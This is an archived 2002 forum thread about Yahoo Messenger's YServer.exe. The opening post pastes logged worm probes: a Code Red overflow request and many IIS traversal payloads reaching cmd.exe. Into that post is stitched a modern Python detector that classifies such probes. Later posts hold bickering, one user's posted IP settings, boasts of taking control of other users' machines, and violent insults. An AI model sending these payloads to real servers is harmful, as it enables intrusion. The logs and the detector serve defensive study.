
Not a trick but proves Yahoo sucks


halcy0nical
02-26-2002, 05:09 PM
In the recent build of yahoo messenger there is a pretty big flaw. When you first open it, it runs a file called Yserver.exe, which in turn announces to the internet your computer is a server. This doesn't sound too bad, but since hundreds if not thousands of computers are infected with worms, they will try to attack your computer as well. You can see evidence of this by opening your YServer.log file (C:/Program Files/Yahoo!/Messenger/Yserver.log) in notepad. The following describes what the attacks look like:
Code red worm: IP from = 218.49.232.235
02/17/102 23:00:16.820 02/17/102 23:00:17.310 00:00:00.490 218.49.232.235 Get text/plain /default.ida -1 0 .ida GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%u cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b %u53ff%u0078%u0000%u00=a HTTP/1.0
Content-type: text/xml
HOST:www.worm.com
Accept: */*
Content-length: 3569

IIS Attacks: IP from = 66.44.12.141 and 66.68.68.238
02/25/102 13:31:58.740 02/25/102 13:31:58.740 00:00:00.000 66.44.12.141 Get application/x-msdownload /scripts/root.exe -1 0 .exe GET /scripts/root.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 13:32:07.640 02/25/102 13:32:08.190 00:00:00.550 66.44.12.141 Get application/x-msdownload /MSADC/root.exe -1 0 .exe GET /MSADC/root.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 13:32:17.800 02/25/102 13:32:18.300 00:00:00.500 66.44.12.141 Get application/x-msdownload /c/winnt/system32/cmd.exe -1 0 .exe GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:10.660 02/25/102 17:03:11.150 00:00:00.490 66.68.68.238 Get application/x-msdownload /scripts/root.exe -1 0 .exe GET /scripts/root.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:11.760 02/25/102 17:03:12.250 00:00:00.490 66.68.68.238 Get application/x-msdownload /MSADC/root.exe -1 0 .exe GET /MSADC/root.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:12.860 02/25/102 17:03:13.350 00:00:00.490 66.68.68.238 Get application/x-msdownload /c/winnt/system32/cmd.exe -1 0 .exe GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:13.950 02/25/102 17:03:14.450 00:00:00.500 66.68.68.238 Get application/x-msdownload /d/winnt/system32/cmd.exe -1 0 .exe GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:15.050 02/25/102 17:03:15.550 00:00:00.500 66.68.68.238 Get application/x-msdownload /scripts/..%255c../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:16.210 02/25/102 17:03:16.700 00:00:00.490 66.68.68.238 Get application/x-msdownload /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe -1 0 .exe GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:17.300 02/25/102 17:03:17.800 00:00:00.500 66.68.68.238 Get application/x-msdownload /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe -1 0 .exe GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:18.350 02/25/102 17:03:18.840 00:00:00.490 66.68.68.238 Get application/x-msdownload /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe -1 0 .exe GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:19.450 02/25/102 17:03:19.940 00:00:00.490 66.68.68.238 Get application/x-msdownload /scripts/..%c1%1c../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:20.490 02/25/102 17:03:21.040 00:00:00.550 66.68.68.238 Get application/x-msdownload /scripts/..%c0%2f../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:21.590 02/25/102 17:03:22.080 00:00:00.490 66.68.68.238 Get application/x-msdownload /scripts/..%c0%af../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:22.630 02/25/102 17:03:23.130 00:00:00.500 66.68.68.238 Get application/x-msdownload /scripts/..%c1%9c../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:23.730 02/25/102 17:03:24.220 00:00:00.490 66.68.68.238 Get application/x-msdownload /scripts/..%%35%63../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:24.830 02/25/102 17:03:25.320 00:00:00.490 66.68.68.238 Get application/x-msdownload /scripts/..%%35c../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:25.870 02/25/102 17:03:26.370 00:00:00.500 66.68.68.238 Get application/x-msdownload /scripts/..%25%35%63../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:26.920 02/25/102 17:03:27.470 00:00:00.550 66.68.68.238 Get application/x-msdownload /scripts/..%252f../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close

Luckily, this isn't harmful to most of you since you don't use a server at home, but there is probably a way to exploit this for other uses. By the way, if you want to find out where the attacking IP is located, go to http://visualroute.visualware.com/ type the ip in the box, and push enter. I even had one attack coming from some apartment place in Plano, Texas.
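The log excerpts above are the useful part of this thread from a defender's point of view: they show the two probe families that were hitting any host with a listening web server at the time (the Code Red /default.ida overflow request and the IIS cmd.exe / root.exe directory-traversal probes). The script below is an added example, not code from the thread or from Yahoo: it parses YServer.log records in the layout quoted above, classifies each request, and summarises hits per source IP. It assumes the record layout seen in the quoted lines (start timestamp, end timestamp, duration, source IP, method, MIME type, path, two numeric fields, extension, then the raw request line, followed by header lines until the next record) and that the odd year field "102" is years since 1900, i.e. 2002; the sample log is constructed here using RFC 5737 documentation addresses rather than the IPs from the thread.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample, modelled on the YServer.log records quoted in the thread
# (addresses are RFC 5737 documentation ranges, not the IPs from the thread).
SAMPLE_LOG = """\
02/17/102 23:00:16.820 02/17/102 23:00:17.310 00:00:00.490 192.0.2.10 Get text/plain /default.ida -1 0 .ida GET /default.ida?NNNNNNNN%u9090%u6858%ucbd3%u7801=a HTTP/1.0
Content-type: text/xml
HOST:www.worm.com
Accept: */*
Content-length: 3569

02/25/102 13:31:58.740 02/25/102 13:31:58.740 00:00:00.000 192.0.2.20 Get application/x-msdownload /scripts/root.exe -1 0 .exe GET /scripts/root.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:15.050 02/25/102 17:03:15.550 00:00:00.500 192.0.2.20 Get application/x-msdownload /scripts/..%255c../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/25/102 17:03:20.490 02/25/102 17:03:21.040 00:00:00.550 192.0.2.20 Get application/x-msdownload /scripts/..%c0%af../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close


02/26/102 09:00:00.000 02/26/102 09:00:00.100 00:00:00.100 192.0.2.30 Get text/html /index.html -1 0 .html GET /index.html HTTP/1.0
Host: www
"""

# A record line starts with "MM/DD/YYY HH:MM:SS.mmm"; the year is assumed to be
# years since 1900 (so "102" is 2002). Header lines (Host:, Content-type:, ...)
# do not match and are treated as belonging to the preceding record.
RECORD_RE = re.compile(r"^\d{2}/\d{2}/\d+ \d{2}:\d{2}:\d{2}\.\d{3} ")

CMD_TARGETS = ("cmd.exe", "root.exe")


def decode_twice(path: str) -> bytes:
    """Percent-decode twice so that %255c (-> %5c -> '\\') is exposed.
    Work on bytes so overlong UTF-8 such as %c0%af is kept verbatim instead of
    being mangled by a text decode."""
    return unquote_to_bytes(unquote_to_bytes(path))


def classify(request_target: str) -> tuple[str, list[str]]:
    """Return (category, indicators) for the request target of one record."""
    path = request_target.split("?", 1)[0]
    low = path.lower()
    if low.startswith("/default.ida"):
        return "code-red", ["/default.ida buffer-overflow probe"]
    indicators = []
    decoded = decode_twice(path)
    if b"..\\" in decoded or b"../" in decoded:
        indicators.append("directory traversal (after double decode)")
    if re.search(rb"\.\.[\xc0-\xff]", decoded):
        indicators.append("directory traversal (overlong/malformed UTF-8)")
    hits = [t for t in CMD_TARGETS if t in low]
    if hits:
        indicators.append("command shell request: " + ", ".join(hits))
    return ("iis-probe", indicators) if indicators else ("benign", [])


def parse_yserver_log(text: str) -> list[dict]:
    """Parse record lines from YServer.log text into classified dicts."""
    records = []
    for line in text.splitlines():
        if not RECORD_RE.match(line):
            continue
        fields = line.split(None, 12)  # 12 fixed fields + the raw request line
        if len(fields) < 13:
            continue  # truncated record, skip rather than guess
        start_date, start_time, _, _, duration, src_ip, method, mime, path, _, _, ext, request_line = fields
        parts = request_line.split()
        target = parts[1] if len(parts) >= 2 else path
        category, indicators = classify(target)
        records.append({
            "start": f"{start_date} {start_time}",
            "duration": duration,
            "src_ip": src_ip,
            "target": target,
            "category": category,
            "indicators": indicators,
        })
    return records


def summarize(records: list[dict]) -> dict[str, dict[str, int]]:
    """Count categories per source IP, which is what you want to feed a blocklist
    or an abuse report."""
    per_ip = defaultdict(Counter)
    for r in records:
        per_ip[r["src_ip"]][r["category"]] += 1
    return {ip: dict(c) for ip, c in per_ip.items()}


if __name__ == "__main__":
    recs = parse_yserver_log(SAMPLE_LOG)
    for r in recs:
        print(f"{r['start']} {r['src_ip']:<12} {r['category']:<9} {r['target']}")
        for ind in r["indicators"]:
            print(f"    - {ind}")
    print(summarize(recs))
```

Double-decoding matters because the `%255c` form only becomes a backslash after two passes, and the overlong forms (`%c0%af`, `%c1%1c`, `%c1%9c`) never decode to a valid slash at all, which is exactly why they slipped past the server's path checks; a detector that decodes once, or decodes to text with replacement characters, will miss one family or the other.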

-69-
02-26-2002, 05:23 PM
hit ctrl+alt+del and close Yserver. Messenger still stays on but the worm is gone

Marijuana
03-24-2002, 08:08 AM
w0rm my ass ... if u guys dunno wat it is dont hype it up

limp & mike u wanna talk bout it come over see me dogg and rob

Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : midsouth.rr.com IP Address. . . . . . . . . . . . : 24.165.145.32 Subnet Mask . . . . . . . . . . . : 255.255.252.0 Default Gateway . . . . . . . . . : 24.165.144.1

lzicl_cash
03-24-2002, 02:09 PM
wtf r u guys talking bout? i can't understand ANYTHING u guyz r say'n

____Daniel_____
03-25-2002, 07:24 AM
they r talkin bout how to make a pie:D

Mandy
03-28-2002, 09:15 AM
its not new news to hear that yahoo sux we all knew this for the longest time but you are right this proves they extra suclz

Mandy
04-01-2002, 03:29 AM
you all hardcore up on this subject limpy why such a strong opinion? if i may ask *Hides in corner *

JakeTheBot
08-25-2002, 01:01 AM
lol funny talking about yserver.exe lol lmfao do some real stuff sniff the data with commview and then you can see the real packets :-D www.commview.com get the shareware lol

-$mev-
08-25-2002, 05:29 PM
lol...guys...ANY SERVER file can be used to trojan..once you have the server on your pc it opens a port up which can be exploited with certains trojans or certain worms.... if any1 want to know.. believe me if u want...but eh...some will know this is true

pascal
11-12-2002, 01:36 PM
Shut the fock up $mev, i have a comp as server and i use Yahoo messenger, i never got a problem, FOCK UP damn newbies!

-$mev-
11-12-2002, 07:08 PM
Pascal... u child.. this post was ages ago.. and u obviously know $hit... yes, a server carries. As limp said u fricking idiot "Which could mean nothing at all, or could mean something." READ BEFORE YOU MOUTH OFF.. and what am I a newbie to? Ur a newbie to this site, I've been on yahoo longer than you, ive probably been living longer than you... who's a newbie? THINK BEFORE YOU SPEAK FRENCHIE.. and btw.. I know who u are

Idbeholda
11-12-2002, 07:45 PM
*points and laughs at pascal*

pascal
11-12-2002, 08:35 PM
Oh $vev man ! tell me the name of the TROJAN than u speak a lot,
no response ???
U GET PISSED LOL

KANE_6969
11-12-2002, 09:20 PM
Smev isn't lying... There is a server file... It has something to do with the yahoo updater :)... I'm such a pimp.. Smev it is highly vulnerable being something new.... And yes you can over flow and control other machines with this server file....The extent i have been able to use it is yahoo options only.. I haven't been able to get outta others messengers... and into other files on their comp... in time..I should have spent more time with altering trojans hehehe.. cuz all i doing is altering a server file here hehehe.....Who should i completely own once i learn?

KANE_6969
11-12-2002, 09:20 PM
pascal it is NOT a trojan merely a way for yahoo to connect to your comp and update or tell you there is an update...

Andy
11-12-2002, 09:33 PM
just testin my italic id, nvm me :)

pascal
11-12-2002, 10:30 PM
Yes your right kane, that $mev is a real loser

that_pope
11-12-2002, 11:28 PM
hmmm, nah, smev is cool with me

-$mev-
11-13-2002, 04:20 PM
Pascal? Are u stupid? Little kid.. before you go posting $hite find out your facts, thx pope.. u2 sugar plum ;) LOL

Wood
11-17-2002, 12:24 PM
The light shines down on pascal as everyone considers him a little rascal, actual fact of the matter he is a bug stain splatter on someones window, just annoying to the point of wanting to kill him again, and stab the mother phucka with a ink pen

Idbeholda
11-17-2002, 05:50 PM
Pascal seems like the kinda person that would **** a man and not even have the common courtesy to give him a reach around. That could be all the beer talking though ;p.. but i doubt it.

Goku
11-17-2002, 09:08 PM
lol, wood, nice rhyme, and idbeholda, nice full metal jacket quote...hehe, im not gonna get into this, but it seems kane/ smev / both seem to know more than this pascal guy, so i am on their side...

Wood
11-18-2002, 05:26 PM
You know it goku,

Anyone who stands up to me i'll tear em up into toefu
Yo you pacal, phuck the little racals show em your muscles
And they'll know you can't hussle a dime
Plus you are wack and out of line
Its a crime that my name is wood
and i just could become the next great white hope
spendin most of my days smokin to much phuckin dope
i'll put the knife to his throat like it was the old mans rope
you can't cope with the ways i put it to you
i'll zip you up in a body bag with supaglue
your favorite homo is a pikachu
goin to the doctor cause you thinks you got a flu
actually you just going so you can bend over
and watch wood roll on 20's in a range rover

hehehe, INDIANA what!

-$mev-
11-18-2002, 07:38 PM
LOL... i think thats the best way I've EVER heard it put ;)

Wood
11-18-2002, 09:16 PM
Heh, tru tru!
Man...smev honestly though i don't think anyone will be able to make underscores or rares again, there is still exploits out there but for me i always get so close and choke.

Goku
11-19-2002, 05:01 PM
yea i did make an ASCII once...and well i think i could figure it out once again, but i dont seem to want to try.